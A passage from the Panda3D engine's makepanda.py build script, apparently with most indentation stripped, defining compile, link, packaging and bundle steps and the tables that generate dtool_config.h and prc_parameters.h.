if LDFLAGS != "":
cmd += " " + LDFLAGS
        # Don't link dynamic libraries against libpython; executables, RTDIST
        # builds, and Android targets still do.
if "PYTHON" in opts and GetOrigExt(dll) != ".exe" and not RTDIST and GetTarget() != 'android':
opts = opts[:]
opts.remove("PYTHON")
for (opt, dir) in LIBDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -L' + BracketNameWithQuotes(dir)
for (opt, dir) in FRAMEWORKDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -F' + BracketNameWithQuotes(dir)
for (opt, name) in LIBNAMES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' ' + BracketNameWithQuotes(name)
if GetTarget() != 'freebsd':
cmd += " -ldl"
oscmd(cmd)
if GetOptimizeOption(opts) == 4 and GetTarget() in ('linux', 'android'):
oscmd(GetStrip() + " --strip-unneeded " + BracketNameWithQuotes(dll))
os.system("chmod +x " + BracketNameWithQuotes(dll))
if dll.endswith("." + MAJOR_VERSION + ".dylib"):
newdll = dll[:-6-len(MAJOR_VERSION)] + "dylib"
if os.path.isfile(newdll):
os.remove(newdll)
oscmd("ln -s " + BracketNameWithQuotes(os.path.basename(dll)) + " " + BracketNameWithQuotes(newdll))
elif dll.endswith("." + MAJOR_VERSION):
newdll = dll[:-len(MAJOR_VERSION)-1]
if os.path.isfile(newdll):
os.remove(newdll)
oscmd("ln -s " + BracketNameWithQuotes(os.path.basename(dll)) + " " + BracketNameWithQuotes(newdll))
##########################################################################################
#
# CompileEgg
#
##########################################################################################
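# CompileEgg copies or converts a model source (.egg or .flt) into the target
# .egg file, pzip-compressing the result when the original target name ended
# in ".pz".  When cross-compiling, pzip and flt2egg are taken from the PATH
# rather than from the freshly built bin/ directory.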
def CompileEgg(eggfile, src, opts):
pz = False
if eggfile.endswith(".pz"):
pz = True
eggfile = eggfile[:-3]
# Determine the location of the pzip and flt2egg tools.
if CrossCompiling():
# We may not be able to use our generated versions of these tools,
# so we'll expect them to already be present in the PATH.
pzip = 'pzip'
flt2egg = 'flt2egg'
else:
# If we're compiling for this machine, we can use the binaries we've built.
pzip = os.path.join(GetOutputDir(), 'bin', 'pzip')
flt2egg = os.path.join(GetOutputDir(), 'bin', 'flt2egg')
if not os.path.isfile(pzip):
pzip = 'pzip'
if not os.path.isfile(flt2egg):
flt2egg = 'flt2egg'
if src.endswith(".egg"):
CopyFile(eggfile, src)
elif src.endswith(".flt"):
oscmd(flt2egg + ' -ps keep -o ' + BracketNameWithQuotes(eggfile) + ' ' + BracketNameWithQuotes(src))
if pz:
oscmd(pzip + ' ' + BracketNameWithQuotes(eggfile))
##########################################################################################
#
# CompileRes, CompileRsrc
#
##########################################################################################
def CompileRes(target, src, opts):
"""Compiles a Windows .rc file into a .res file."""
ipath = GetListOption(opts, "DIR:")
if (COMPILER == "MSVC"):
cmd = "rc"
cmd += " /Fo" + BracketNameWithQuotes(target)
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
cmd += " /D" + var + "=" + val
cmd += " " + BracketNameWithQuotes(src)
else:
cmd = "windres"
for x in ipath: cmd += " -I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " -I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
cmd += " -D" + var + "=" + val
cmd += " -i " + BracketNameWithQuotes(src)
cmd += " -o " + BracketNameWithQuotes(target)
oscmd(cmd)
def CompileRsrc(target, src, opts):
"""Compiles a Mac OS .r file into an .rsrc file."""
ipath = GetListOption(opts, "DIR:")
if os.path.isfile("/usr/bin/Rez"):
cmd = "Rez -useDF"
else:
cmd = "/Developer/Tools/Rez -useDF"
cmd += " -o " + BracketNameWithQuotes(target)
for x in ipath:
cmd += " -i " + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " -i " + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
if (val == ""):
cmd += " -d " + var
else:
cmd += " -d " + var + " = " + val
cmd += " " + BracketNameWithQuotes(src)
oscmd(cmd)
##########################################################################################
#
# CompileJava (Android only)
#
##########################################################################################
def CompileJava(target, src, opts):
"""Compiles a .java file into a .class file."""
cmd = "ecj "
optlevel = GetOptimizeOption(opts)
if optlevel >= 4:
cmd += "-debug:none "
cmd += "-cp " + GetOutputDir() + "/classes "
cmd += "-d " + GetOutputDir() + "/classes "
cmd += BracketNameWithQuotes(src)
oscmd(cmd)
##########################################################################################
#
# FreezePy
#
##########################################################################################
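# FreezePy runs direct/showutil/pfreeze.py under the build Python to freeze
# one or more Python modules into a generated C file, executable, or library.
# For .exe targets the first input becomes the main module; the remaining
# inputs are passed with -i (with "direct.src" collapsed to "direct").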
def FreezePy(target, inputs, opts):
assert len(inputs) > 0
cmdstr = BracketNameWithQuotes(SDK["PYTHONEXEC"].replace('\\', '/')) + " "
if sys.version_info >= (2, 6):
cmdstr += "-B "
cmdstr += os.path.join(GetOutputDir(), "direct", "showutil", "pfreeze.py")
if 'FREEZE_STARTUP' in opts:
cmdstr += " -s"
if GetOrigExt(target) == '.exe':
src = inputs.pop(0)
else:
src = ""
for i in inputs:
i = os.path.splitext(i)[0]
i = i.replace('/', '.')
if i.startswith('direct.src'):
i = i.replace('.src.', '.')
cmdstr += " -i " + i
cmdstr += " -o " + target + " " + src
if ("LINK_PYTHON_STATIC" in opts):
os.environ["LINK_PYTHON_STATIC"] = "1"
oscmd(cmdstr)
if ("LINK_PYTHON_STATIC" in os.environ):
del os.environ["LINK_PYTHON_STATIC"]
if (not os.path.exists(target)):
exit("FREEZER_ERROR")
##########################################################################################
#
# Package
#
##########################################################################################
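# Package invokes direct/src/p3d/ppackage.py on a .pdef file.  For a .p3d
# target it builds that single application (and, on Windows, a small .exe
# wrapper around it); otherwise it builds the packages into the stage/
# directory under the output dir.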
def Package(target, inputs, opts):
assert len(inputs) == 1
# Invoke the ppackage script.
command = BracketNameWithQuotes(SDK["PYTHONEXEC"]) + " "
if GetOptimizeOption(opts) >= 4:
command += "-OO "
if sys.version_info >= (2, 6):
command += "-B "
command += "direct/src/p3d/ppackage.py"
if not RTDIST:
        # Don't compile Python sources, because we might not be running the same
        # Python version as the selected host.
command += " -N"
if GetTarget() == "darwin":
if SDK.get("MACOSX"):
command += " -R \"%s\"" % SDK["MACOSX"]
for arch in OSX_ARCHS:
if arch == "x86_64":
arch = "amd64"
command += " -P osx_%s" % arch
command += " -i \"" + GetOutputDir() + "/stage\""
if (P3DSUFFIX):
command += ' -a "' + P3DSUFFIX + '"'
command += " " + inputs[0]
if GetOrigExt(target) == '.p3d':
# Build a specific .p3d file.
basename = os.path.basename(os.path.splitext(target)[0])
command += " " + basename
oscmd(command)
if GetTarget() == 'windows':
# Make an .exe that calls this .p3d.
objfile = FindLocation('p3dWrapper_' + basename + '.obj', [])
CompileCxx(objfile, 'direct/src/p3d/p3dWrapper.c', [])
exefile = FindLocation(basename + '.exe', [])
CompileLink(exefile, [objfile], ['ADVAPI'])
# Move it to the bin directory.
os.rename(GetOutputDir() + '/stage/' + basename + P3DSUFFIX + '.p3d', target)
if sys.platform != 'win32':
oscmd('chmod +x ' + BracketNameWithQuotes(target))
else:
# This is presumably a package or set of packages.
oscmd(command)
##########################################################################################
#
# CompileBundle
#
##########################################################################################
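# CompileBundle assembles a Mac OS X bundle (.app or .plugin): the object
# files are linked into Contents/MacOS/<CFBundleExecutable>, the plist is
# copied to Contents/Info.plist, and any .rsrc/.icns inputs are copied into
# Contents/Resources/.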
def CompileBundle(target, inputs, opts):
assert GetTarget() == "darwin", 'bundles can only be made for Mac OS X'
plist = None
resources = []
objects = []
for i in inputs:
if (i.endswith(".plist")):
if (plist != None): exit("Only one plist file can be used when creating a bundle!")
plist = i
elif (i.endswith(".rsrc") or i.endswith(".icns")):
resources.append(i)
elif (GetOrigExt(i) == ".obj" or GetOrigExt(i) in SUFFIX_LIB or GetOrigExt(i) in SUFFIX_DLL):
objects.append(i)
else:
exit("Don't know how to bundle file %s" % i)
# Now link the object files to form the bundle.
if (plist == None): exit("One plist file must be used when creating a bundle!")
bundleName = plistlib.readPlist(plist)["CFBundleExecutable"]
oscmd("rm -rf %s" % target)
oscmd("mkdir -p %s/Contents/MacOS/" % target)
oscmd("mkdir -p %s/Contents/Resources/" % target)
if target.endswith(".app"):
SetOrigExt("%s/Contents/MacOS/%s" % (target, bundleName), ".exe")
else:
SetOrigExt("%s/Contents/MacOS/%s" % (target, bundleName), ".dll")
CompileLink("%s/Contents/MacOS/%s" % (target, bundleName), objects, opts + ["BUNDLE"])
oscmd("cp %s %s/Contents/Info.plist" % (plist, target))
for r in resources:
oscmd("cp %s %s/Contents/Resources/" % (r, target))
##########################################################################################
#
# CompileMIDL
#
##########################################################################################
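# CompileMIDL runs the MSVC "midl" compiler over an .idl file, writing the
# generated sources into the directory of the requested target.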
def CompileMIDL(target, src, opts):
ipath = GetListOption(opts, "DIR:")
if (COMPILER=="MSVC"):
cmd = "midl"
cmd += " /out" + BracketNameWithQuotes(os.path.dirname(target))
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += " /D" + var + "=" + val
cmd += " " + BracketNameWithQuotes(src)
oscmd(cmd)
##########################################################################################
#
# CompileAnything
#
##########################################################################################
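# CompileAnything is the dispatcher used by the build graph: it inspects the
# target's original extension (and that of the first input) and forwards the
# work to the appropriate routine above, printing a progress line for each
# step.  On Unix-like platforms it also folds the major version number into
# the filename of versioned dynamic libraries before linking.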
def CompileAnything(target, inputs, opts, progress = None):
if (opts.count("DEPENDENCYONLY")):
return
if (len(inputs)==0):
exit("No input files for target "+target)
infile = inputs[0]
origsuffix = GetOrigExt(target)
if (len(inputs) == 1 and origsuffix == GetOrigExt(infile)):
# It must be a simple copy operation.
ProgressOutput(progress, "Copying file", target)
CopyFile(target, infile)
if (origsuffix==".exe" and GetHost() != "windows"):
os.system("chmod +x \"%s\"" % target)
return
elif (infile.endswith(".py")):
if origsuffix == ".obj":
source = os.path.splitext(target)[0] + ".c"
SetOrigExt(source, ".c")
ProgressOutput(progress, "Building frozen source", source)
FreezePy(source, inputs, opts)
ProgressOutput(progress, "Building C++ object", target)
return CompileCxx(target, source, opts)
if origsuffix == ".exe":
ProgressOutput(progress, "Building frozen executable", target)
else:
ProgressOutput(progress, "Building frozen library", target)
return FreezePy(target, inputs, opts)
elif (infile.endswith(".idl")):
ProgressOutput(progress, "Compiling MIDL file", infile)
return CompileMIDL(target, infile, opts)
elif (infile.endswith(".pdef")):
if origsuffix == '.p3d':
ProgressOutput(progress, "Building package", target)
else:
ProgressOutput(progress, "Building package from pdef file", infile)
return Package(target, inputs, opts)
elif origsuffix in SUFFIX_LIB:
ProgressOutput(progress, "Linking static library", target)
return CompileLib(target, inputs, opts)
elif origsuffix in SUFFIX_DLL or (origsuffix==".plugin" and GetTarget() != "darwin"):
if (origsuffix==".exe"):
ProgressOutput(progress, "Linking executable", target)
else:
ProgressOutput(progress, "Linking dynamic library", target)
        # Add the version number to the dynamic library's filename on Unix-like systems.
if origsuffix == ".dll" and "MODULE" not in opts and not RTDIST:
tplatform = GetTarget()
if tplatform == "darwin":
# On Mac, libraries are named like libpanda.1.2.dylib
if target.lower().endswith(".dylib"):
target = target[:-5] + MAJOR_VERSION + ".dylib"
SetOrigExt(target, origsuffix)
elif tplatform != "windows" and tplatform != "android":
# On Linux, libraries are named like libpanda.so.1.2
target += "." + MAJOR_VERSION
SetOrigExt(target, origsuffix)
return CompileLink(target, inputs, opts)
elif (origsuffix==".in"):
ProgressOutput(progress, "Building Interrogate database", target)
args = CompileIgate(target, inputs, opts)
ProgressOutput(progress, "Building C++ object", args[0])
return CompileCxx(*args)
elif (origsuffix==".plugin" and GetTarget() == "darwin"):
ProgressOutput(progress, "Building plugin bundle", target)
return CompileBundle(target, inputs, opts)
elif (origsuffix==".app"):
ProgressOutput(progress, "Building application bundle", target)
return CompileBundle(target, inputs, opts)
elif (origsuffix==".pz"):
ProgressOutput(progress, "Compressing", target)
return CompileEgg(target, infile, opts)
elif (origsuffix==".egg"):
ProgressOutput(progress, "Converting", target)
return CompileEgg(target, infile, opts)
elif (origsuffix==".res"):
ProgressOutput(progress, "Building resource object", target)
return CompileRes(target, infile, opts)
elif (origsuffix==".rsrc"):
ProgressOutput(progress, "Building resource object", target)
return CompileRsrc(target, infile, opts)
elif (origsuffix==".class"):
ProgressOutput(progress, "Building Java class", target)
return CompileJava(target, infile, opts)
elif (origsuffix==".obj"):
if (infile.endswith(".cxx")):
ProgressOutput(progress, "Building C++ object", target)
return CompileCxx(target, infile, opts)
elif (infile.endswith(".c")):
ProgressOutput(progress, "Building C object", target)
return CompileCxx(target, infile, opts)
elif (infile.endswith(".mm")):
ProgressOutput(progress, "Building Objective-C++ object", target)
return CompileCxx(target, infile, opts)
elif (infile.endswith(".yxx")):
ProgressOutput(progress, "Building Bison object", target)
return CompileBison(target, infile, opts)
elif (infile.endswith(".lxx")):
ProgressOutput(progress, "Building Flex object", target)
return CompileFlex(target, infile, opts)
elif (infile.endswith(".in")):
ProgressOutput(progress, "Building Interrogate object", target)
return CompileImod(target, inputs, opts)
elif (infile.endswith(".rc")):
ProgressOutput(progress, "Building resource object", target)
return CompileRes(target, infile, opts)
elif (infile.endswith(".r")):
ProgressOutput(progress, "Building resource object", target)
return CompileRsrc(target, infile, opts)
exit("Don't know how to compile: %s from %s" % (target, inputs))
##########################################################################################
#
# Generate dtool_config.h, prc_parameters.h, and dtool_have_xxx.dat
#
##########################################################################################
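# Each DTOOL_CONFIG row is (variable, value on Windows, value on Unix-like
# platforms).  A value of 'UNDEF' is emitted as "#undef"; any other value
# becomes a "#define" in dtool_config.h.  WriteConfigSettings below adjusts
# these defaults per target platform and per enabled package.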
DTOOL_CONFIG=[
#_Variable_________________________Windows___________________Unix__________
("HAVE_PYTHON", '1', '1'),
("USE_DEBUG_PYTHON", 'UNDEF', 'UNDEF'),
("PYTHON_FRAMEWORK", 'UNDEF', 'UNDEF'),
("COMPILE_IN_DEFAULT_FONT", '1', '1'),
("STDFLOAT_DOUBLE", 'UNDEF', 'UNDEF'),
("HAVE_MAYA", '1', '1'),
("HAVE_SOFTIMAGE", 'UNDEF', 'UNDEF'),
("REPORT_OPENSSL_ERRORS", '1', '1'),
("USE_PANDAFILESTREAM", '1', '1'),
("USE_DELETED_CHAIN", '1', '1'),
("HAVE_GLX", 'UNDEF', '1'),
("HAVE_WGL", '1', 'UNDEF'),
("HAVE_DX9", 'UNDEF', 'UNDEF'),
("HAVE_THREADS", '1', '1'),
("SIMPLE_THREADS", 'UNDEF', 'UNDEF'),
("OS_SIMPLE_THREADS", '1', '1'),
("DEBUG_THREADS", 'UNDEF', 'UNDEF'),
("HAVE_POSIX_THREADS", 'UNDEF', '1'),
("HAVE_AUDIO", '1', '1'),
("NOTIFY_DEBUG", 'UNDEF', 'UNDEF'),
("DO_PSTATS", 'UNDEF', 'UNDEF'),
("DO_DCAST", 'UNDEF', 'UNDEF'),
("DO_COLLISION_RECORDING", 'UNDEF', 'UNDEF'),
("SUPPORT_IMMEDIATE_MODE", 'UNDEF', 'UNDEF'),
("SUPPORT_FIXED_FUNCTION", '1', '1'),
("DO_MEMORY_USAGE", 'UNDEF', 'UNDEF'),
("DO_PIPELINING", '1', '1'),
("DEFAULT_PATHSEP", '";"', '":"'),
("WORDS_BIGENDIAN", 'UNDEF', 'UNDEF'),
("HAVE_OPEN_MASK", 'UNDEF', 'UNDEF'),
("HAVE_LOCKF", '1', '1'),
("HAVE_WCHAR_T", '1', '1'),
("HAVE_WSTRING", '1', '1'),
("SIMPLE_STRUCT_POINTERS", '1', 'UNDEF'),
("HAVE_DINKUM", 'UNDEF', 'UNDEF'),
("HAVE_STL_HASH", 'UNDEF', 'UNDEF'),
("GETTIMEOFDAY_ONE_PARAM", 'UNDEF', 'UNDEF'),
("HAVE_GETOPT", 'UNDEF', '1'),
("HAVE_GETOPT_LONG_ONLY", 'UNDEF', '1'),
("PHAVE_GETOPT_H", 'UNDEF', '1'),
("PHAVE_LINUX_INPUT_H", 'UNDEF', '1'),
("IOCTL_TERMINAL_WIDTH", 'UNDEF', '1'),
("HAVE_STREAMSIZE", '1', '1'),
("HAVE_IOS_TYPEDEFS", '1', '1'),
("HAVE_IOS_BINARY", '1', '1'),
("STATIC_INIT_GETENV", '1', 'UNDEF'),
("HAVE_PROC_SELF_EXE", 'UNDEF', '1'),
("HAVE_PROC_SELF_MAPS", 'UNDEF', '1'),
("HAVE_PROC_SELF_ENVIRON", 'UNDEF', '1'),
("HAVE_PROC_SELF_CMDLINE", 'UNDEF', '1'),
("HAVE_PROC_CURPROC_FILE", 'UNDEF', 'UNDEF'),
("HAVE_PROC_CURPROC_MAP", 'UNDEF', 'UNDEF'),
("HAVE_PROC_SELF_CMDLINE", 'UNDEF', 'UNDEF'),
("HAVE_GLOBAL_ARGV", '1', 'UNDEF'),
("PROTOTYPE_GLOBAL_ARGV", 'UNDEF', 'UNDEF'),
("GLOBAL_ARGV", '__argv', 'UNDEF'),
("GLOBAL_ARGC", '__argc', 'UNDEF'),
("PHAVE_IO_H", '1', 'UNDEF'),
("PHAVE_IOSTREAM", '1', '1'),
("PHAVE_STRING_H", 'UNDEF', '1'),
("PHAVE_LIMITS_H", 'UNDEF', '1'),
("PHAVE_STDLIB_H", 'UNDEF', '1'),
("PHAVE_MALLOC_H", '1', '1'),
("PHAVE_SYS_MALLOC_H", 'UNDEF', 'UNDEF'),
("PHAVE_ALLOCA_H", 'UNDEF', '1'),
("PHAVE_LOCALE_H", 'UNDEF', '1'),
("PHAVE_MINMAX_H", '1', 'UNDEF'),
("PHAVE_SSTREAM", '1', '1'),
("PHAVE_NEW", '1', '1'),
("PHAVE_SYS_TYPES_H", '1', '1'),
("PHAVE_SYS_TIME_H", 'UNDEF', '1'),
("PHAVE_UNISTD_H", 'UNDEF', '1'),
("PHAVE_UTIME_H", 'UNDEF', '1'),
("PHAVE_GLOB_H", 'UNDEF', '1'),
("PHAVE_DIRENT_H", 'UNDEF', '1'),
("PHAVE_SYS_SOUNDCARD_H", 'UNDEF', '1'),
("PHAVE_UCONTEXT_H", 'UNDEF', '1'),
("PHAVE_STDINT_H", '1', '1'),
("HAVE_RTTI", '1', '1'),
("HAVE_X11", 'UNDEF', '1'),
("IS_LINUX", 'UNDEF', '1'),
("IS_OSX", 'UNDEF', 'UNDEF'),
("IS_FREEBSD", 'UNDEF', 'UNDEF'),
("HAVE_EIGEN", 'UNDEF', 'UNDEF'),
("LINMATH_ALIGN", '1', '1'),
("HAVE_ZLIB", 'UNDEF', 'UNDEF'),
("HAVE_PNG", 'UNDEF', 'UNDEF'),
("HAVE_JPEG", 'UNDEF', 'UNDEF'),
("PHAVE_JPEGINT_H", '1', '1'),
("HAVE_VIDEO4LINUX", 'UNDEF', '1'),
("HAVE_TIFF", 'UNDEF', 'UNDEF'),
("HAVE_OPENEXR", 'UNDEF', 'UNDEF'),
("HAVE_SGI_RGB", '1', '1'),
("HAVE_TGA", '1', '1'),
("HAVE_IMG", '1', '1'),
("HAVE_SOFTIMAGE_PIC", '1', '1'),
("HAVE_BMP", '1', '1'),
("HAVE_PNM", '1', '1'),
("HAVE_STB_IMAGE", '1', '1'),
("HAVE_VORBIS", 'UNDEF', 'UNDEF'),
("HAVE_OPUS", 'UNDEF', 'UNDEF'),
("HAVE_FREETYPE", 'UNDEF', 'UNDEF'),
("HAVE_FFTW", 'UNDEF', 'UNDEF'),
("HAVE_OPENSSL", 'UNDEF', 'UNDEF'),
("HAVE_NET", 'UNDEF', 'UNDEF'),
("WANT_NATIVE_NET", '1', '1'),
("SIMULATE_NETWORK_DELAY", 'UNDEF', 'UNDEF'),
("HAVE_CG", 'UNDEF', 'UNDEF'),
("HAVE_CGGL", 'UNDEF', 'UNDEF'),
("HAVE_CGDX9", 'UNDEF', 'UNDEF'),
("HAVE_ARTOOLKIT", 'UNDEF', 'UNDEF'),
("HAVE_DIRECTCAM", 'UNDEF', 'UNDEF'),
("HAVE_SQUISH", 'UNDEF', 'UNDEF'),
("HAVE_CARBON", 'UNDEF', 'UNDEF'),
("HAVE_COCOA", 'UNDEF', 'UNDEF'),
("HAVE_OPENAL_FRAMEWORK", 'UNDEF', 'UNDEF'),
("HAVE_ROCKET_PYTHON", '1', '1'),
("HAVE_ROCKET_DEBUGGER", 'UNDEF', 'UNDEF'),
("USE_TAU", 'UNDEF', 'UNDEF'),
("PRC_SAVE_DESCRIPTIONS", '1', '1'),
# ("_SECURE_SCL", '0', 'UNDEF'),
# ("_SECURE_SCL_THROWS", '0', 'UNDEF'),
("HAVE_P3D_PLUGIN", 'UNDEF', 'UNDEF'),
]
PRC_PARAMETERS=[
("DEFAULT_PRC_DIR", '"<auto>etc"', '"<auto>etc"'),
("PRC_DIR_ENVVARS", '"PANDA_PRC_DIR"', '"PANDA_PRC_DIR"'),
("PRC_PATH_ENVVARS", '"PANDA_PRC_PATH"', '"PANDA_PRC_PATH"'),
("PRC_PATH2_ENVVARS", '""', '""'),
("PRC_PATTERNS", '"*.prc"', '"*.prc"'),
("PRC_ENCRYPTED_PATTERNS", '"*.prc.pe"', '"*.prc.pe"'),
("PRC_ENCRYPTION_KEY", '""', '""'),
("PRC_EXECUTABLE_PATTERNS", '""', '""'),
("PRC_EXECUTABLE_ARGS_ENVVAR", '"PANDA_PRC_XARGS"', '"PANDA_PRC_XARGS"'),
("PRC_PUBLIC_KEYS_FILENAME", '""', '""'),
("PRC_RESPECT_TRUST_LEVEL", 'UNDEF', 'UNDEF'),
("PRC_DCONFIG_TRUST_LEVEL", '0', '0'),
("PRC_INC_TRUST_LEVEL", '0', '0'),
]
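# WriteConfigSettings resolves the tables above for the current target,
# optimize level, and package selection, then writes prc_parameters.h,
# dtool_config.h, and (for RTDIST/RUNTIME builds) p3d_plugin_config.h into
# the output include directory, plus one dtool_have_<pkg>.dat flag file per
# package in the tmp directory.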
def WriteConfigSettings():
dtool_config={}
prc_parameters={}
speedtree_parameters={}
plugin_config={}
if (GetTarget() == 'windows'):
for key,win,unix in DTOOL_CONFIG:
dtool_config[key] = win
for key,win,unix in PRC_PARAMETERS:
prc_parameters[key] = win
else:
for key,win,unix in DTOOL_CONFIG:
dtool_config[key] = unix
for key,win,unix in PRC_PARAMETERS:
prc_parameters[key] = unix
for x in PkgListGet():
if ("HAVE_"+x in dtool_config):
if (PkgSkip(x)==0):
dtool_config["HAVE_"+x] = '1'
else:
dtool_config["HAVE_"+x] = 'UNDEF'
dtool_config["HAVE_NET"] = '1'
if (PkgSkip("NVIDIACG")==0):
dtool_config["HAVE_CG"] = '1'
dtool_config["HAVE_CGGL"] = '1'
dtool_config["HAVE_CGDX9"] = '1'
if GetTarget() not in ("linux", "android"):
dtool_config["HAVE_PROC_SELF_EXE"] = 'UNDEF'
dtool_config["HAVE_PROC_SELF_MAPS"] = 'UNDEF'
dtool_config["HAVE_PROC_SELF_CMDLINE"] = 'UNDEF'
dtool_config["HAVE_PROC_SELF_ENVIRON"] = 'UNDEF'
if (GetTarget() == "darwin"):
dtool_config["PYTHON_FRAMEWORK"] = 'Python'
dtool_config["PHAVE_MALLOC_H"] = 'UNDEF'
dtool_config["PHAVE_SYS_MALLOC_H"] = '1'
dtool_config["HAVE_OPENAL_FRAMEWORK"] = '1'
dtool_config["HAVE_X11"] = 'UNDEF' # We might have X11, but we don't need it.
dtool_config["HAVE_GLX"] = 'UNDEF'
dtool_config["IS_LINUX"] = 'UNDEF'
dtool_config["HAVE_VIDEO4LINUX"] = 'UNDEF'
dtool_config["IS_OSX"] = '1'
# 10.4 had a broken ucontext implementation
        if int(platform.mac_ver()[0].split('.')[1]) <= 4:
dtool_config["PHAVE_UCONTEXT_H"] = 'UNDEF'
if (GetTarget() == "freebsd"):
dtool_config["IS_LINUX"] = 'UNDEF'
dtool_config["HAVE_VIDEO4LINUX"] = 'UNDEF'
dtool_config["IS_FREEBSD"] = '1'
dtool_config["PHAVE_ALLOCA_H"] = 'UNDEF'
dtool_config["PHAVE_MALLOC_H"] = 'UNDEF'
dtool_config["PHAVE_LINUX_INPUT_H"] = 'UNDEF'
dtool_config["HAVE_PROC_CURPROC_FILE"] = '1'
dtool_config["HAVE_PROC_CURPROC_MAP"] = '1'
dtool_config["HAVE_PROC_CURPROC_CMDLINE"] = '1'
if (GetTarget() == "android"):
# Android does have RTTI, but we disable it anyway.
dtool_config["HAVE_RTTI"] = 'UNDEF'
dtool_config["PHAVE_GLOB_H"] = 'UNDEF'
dtool_config["HAVE_LOCKF"] = 'UNDEF'
dtool_config["HAVE_VIDEO4LINUX"] = 'UNDEF'
if (GetOptimize() <= 2 and GetTarget() == "windows"):
dtool_config["USE_DEBUG_PYTHON"] = '1'
# This should probably be more sophisticated, such as based
# on whether the libRocket Python modules are available.
if (PkgSkip("PYTHON") != 0):
dtool_config["HAVE_ROCKET_PYTHON"] = 'UNDEF'
if (GetOptimize() <= 3):
dtool_config["HAVE_ROCKET_DEBUGGER"] = '1'
if (GetOptimize() <= 3):
if (dtool_config["HAVE_NET"] != 'UNDEF'):
dtool_config["DO_PSTATS"] = '1'
if (GetOptimize() <= 3):
dtool_config["DO_DCAST"] = '1'
if (GetOptimize() <= 3):
dtool_config["DO_COLLISION_RECORDING"] = '1'
if (GetOptimize() <= 3):
dtool_config["DO_MEMORY_USAGE"] = '1'
if (GetOptimize() <= 3):
dtool_config["NOTIFY_DEBUG"] = '1'
if (GetOptimize() >= 4):
dtool_config["PRC_SAVE_DESCRIPTIONS"] = 'UNDEF'
if (GetOptimize() >= 4):
# Disable RTTI on release builds.
dtool_config["HAVE_RTTI"] = 'UNDEF'
# Now that we have OS_SIMPLE_THREADS, we can support
# SIMPLE_THREADS on exotic architectures like win64, so we no
# longer need to disable it for this platform.
## if GetTarget() == 'windows' and GetTargetArch() == 'x64':
## dtool_config["SIMPLE_THREADS"] = 'UNDEF'
if (RTDIST or RUNTIME):
prc_parameters["DEFAULT_PRC_DIR"] = '""'
if HOST_URL:
plugin_config["PANDA_PACKAGE_HOST_URL"] = HOST_URL
#plugin_config["P3D_PLUGIN_LOG_DIRECTORY"] = ""
plugin_config["P3D_PLUGIN_LOG_BASENAME1"] = ""
plugin_config["P3D_PLUGIN_LOG_BASENAME2"] = ""
plugin_config["P3D_PLUGIN_LOG_BASENAME3"] = ""
plugin_config["P3D_PLUGIN_P3D_PLUGIN"] = ""
plugin_config["P3D_PLUGIN_P3DPYTHON"] = ""
plugin_config["P3D_COREAPI_VERSION_STR"] = COREAPI_VERSION
plugin_config["P3D_PLUGIN_VERSION_STR"] = PLUGIN_VERSION
if PkgSkip("GTK2") == 0:
plugin_config["HAVE_GTK"] = '1'
if (RUNTIME):
dtool_config["HAVE_P3D_PLUGIN"] = '1'
# Whether it's present on the system doesn't matter here,
# as the runtime itself doesn't include or link with X11.
if (RUNTIME and GetTarget() == 'linux'):
dtool_config["HAVE_X11"] = '1'
if ("GENERIC_DXERR_LIBRARY" in SDK):
dtool_config["USE_GENERIC_DXERR_LIBRARY"] = "1"
else:
dtool_config["USE_GENERIC_DXERR_LIBRARY"] = "UNDEF"
if (PkgSkip("SPEEDTREE")==0):
speedtree_parameters["SPEEDTREE_OPENGL"] = "UNDEF"
speedtree_parameters["SPEEDTREE_DIRECTX9"] = "UNDEF"
if SDK["SPEEDTREEAPI"] == "OpenGL":
speedtree_parameters["SPEEDTREE_OPENGL"] = "1"
elif SDK["SPEEDTREEAPI"] == "DirectX9":
speedtree_parameters["SPEEDTREE_DIRECTX9"] = "1"
speedtree_parameters["SPEEDTREE_BIN_DIR"] = (SDK["SPEEDTREE"] + "/Bin")
conf = "/* prc_parameters.h. Generated automatically by makepanda.py */\n"
for key in sorted(prc_parameters.keys()):
if ((key == "DEFAULT_PRC_DIR") or (key[:4]=="PRC_")):
val = OverrideValue(key, prc_parameters[key])
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " " + val + "\n"
ConditionalWriteFile(GetOutputDir() + '/include/prc_parameters.h', conf)
conf = "/* dtool_config.h. Generated automatically by makepanda.py */\n"
for key in sorted(dtool_config.keys()):
val = OverrideValue(key, dtool_config[key])
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " " + val + "\n"
ConditionalWriteFile(GetOutputDir() + '/include/dtool_config.h', conf)
if (RTDIST or RUNTIME):
conf = "/* p3d_plugin_config.h. Generated automatically by makepanda.py */\n"
for key in sorted(plugin_config.keys()):
val = plugin_config[key]
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " \"" + val.replace("\\", "\\\\") + "\"\n"
ConditionalWriteFile(GetOutputDir() + '/include/p3d_plugin_config.h', conf)
if (PkgSkip("SPEEDTREE")==0):
conf = "/* speedtree_parameters.h. Generated automatically by makepanda.py */\n"
for key in sorted(speedtree_parameters.keys()):
val = OverrideValue(key, speedtree_parameters[key])
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " \"" + val.replace("\\", "\\\\") + "\"\n"
ConditionalWriteFile(GetOutputDir() + '/include/speedtree_parameters.h', conf)
for x in PkgListGet():
